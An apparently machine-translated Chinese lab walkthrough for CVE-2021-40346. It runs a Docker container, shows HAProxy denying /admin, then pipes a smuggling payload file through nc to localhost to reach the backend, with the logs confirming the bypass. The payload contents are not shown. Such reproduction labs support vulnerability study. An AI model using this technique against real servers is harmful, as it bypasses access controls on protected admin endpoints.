![](https://img.laitimes.com/img/__Qf2AjLwojIjJCLyojI0JCLiAjM2EzLcd3LcJzLcJzdllmVldWYtl2Pn5GcukTO2EGM1EWN4ETNwYGZxgzNmdTNlJDZhZjYmNzY2cTYvwFM3QjM4YzMtUGall3LcVmdhNXLwRHdo9CXt92YucWbpRWdvx2Yx5yazF2Lc9CX6MHc0RHaiojIsJye.png)
docker啟動
$ docker build -t cve-2021-40346 .
$ docker run --name poc -p 8000:80 -d --rm -it cve-2021-40346
4941e9f23508b497e4cbe334a75e7cdb84c83478522ed85f48db3477f97a6fb4
複制
測試:
确認
/admin
被拒絕。
$ curl http://localhost:8000
hello
$ curl http://localhost:8000/admin
<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>
複制
你不會
/admin
在日志中看到。這意味着請求沒有到達後端伺服器,因為 HAProxy 拒絕了它。
$ docker logs poc
server start at port 8000
/
複制
然後,您可以確定它可以被 payload.txt 繞過。
$ cat payload.txt | nc localhost 8000
HTTP/1.1 200 OK
content-type: text/plain
date: Wed, 08 Sep 2021 22:31:10 GMT
keep-alive: timeout=5
transfer-encoding: chunked
6
hello
0
複制
你會
/admin
在日志中找到。
$ docker logs poc
server start at port 8000
/
/
/admin
複制
項目位址:
aHR0cHM6Ly9naXRodWIuY29tL2tucXlmMjYzL0NWRS0yMDIxLTQwMzQ2